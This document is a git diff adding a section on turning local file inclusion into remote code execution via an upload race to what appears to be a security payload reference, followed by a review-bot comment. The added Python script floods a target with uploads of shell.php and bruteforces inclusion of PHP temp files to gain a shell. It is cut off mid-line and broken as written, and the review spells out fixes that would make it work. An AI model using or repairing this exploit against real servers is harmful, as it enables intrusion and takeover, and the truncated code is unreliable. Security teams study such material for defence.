diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md index 8a51ec6..f5b936c 100644 --- a/File Inclusion - Path Traversal/README.md +++ b/File Inclusion - Path Traversal/README.md @@ -16,6 +16,7 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e * [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd) * [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron) * [LFI to RCE via upload](#lfi-to-rce-via-upload) +* [LFI to RCE via upload (race)](#lfi-to-rce-via-upload-race) * [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo) * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file) * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions) @@ -243,6 +244,38 @@ http://example.com/index.php?page=path/to/uploaded/file.png In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf +## LFI to RCE via upload (race) + +* Upload a file and trigger a self-inclusion. +* Repeat 1 a shitload of time to: +* increase our odds of winning the race +* increase our guessing odds +* Bruteforce the inclusion of /tmp/[0-9a-zA-Z]{6} +* Enjoy our shell. + +```python +import itertools +import requests +import sys + +print('[+] Trying to win the race') +f = {'file': open('shell.php', 'rb')} +for _ in range(4096 * 4096): + requests.post('http://target.com/index.php?c=index.php', f) + + +print('[+] Bruteforcing the inclusion') +for fname in itertools.combinations(string.ascii_letters + string.digits, 6): + url = 'http://target.com/index.php?c=/tmp/php' + fname + r = requests.get(url) + if 'load average' in r.text: #
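Review bot: the Python snippet in the "LFI to RCE via upload (race)" hunk will not run as written, so the section should be fixed before merging. `string` is used in `string.ascii_letters + string.digits` but never imported (while `sys` is imported and unused); `itertools.combinations(...)` yields tuples, so `'http://target.com/index.php?c=/tmp/php' + fname` raises a TypeError, and combinations neither repeat characters nor vary order, so the loop cannot enumerate PHP's `/tmp/phpXXXXXX` upload names anyway; `itertools.product(string.ascii_letters + string.digits, repeat=6)` with `''.join(fname)` is what is meant. `requests.post('http://target.com/index.php?c=index.php', f)` passes the dict as `data`, not `files=f`, so no multipart upload happens, and because `open('shell.php', 'rb')` is opened once outside the loop, every request after the first sends an exhausted stream; reopen the file (or `seek(0)`) per request. The two phases are also sequential: a temp upload file only exists for the duration of the request that created it, so the inclusion attempts must run concurrently with the uploads (threads or a second process), not after `range(4096 * 4096)` POSTs have finished, and 62^6 sequential GETs is not a realistic bruteforce budget. The bullet list should say why the self-inclusion of `index.php` is needed (it keeps the request, and therefore the temporary file, alive long enough to be hit) and "Repeat 1 a shitload of time" refers to a step number in a list that is not numbered; use a numbered list and plainer wording. Finally, the snippet is cut off at `if 'load average' in r.text: #`, so the success branch (print the URL and stop) is missing.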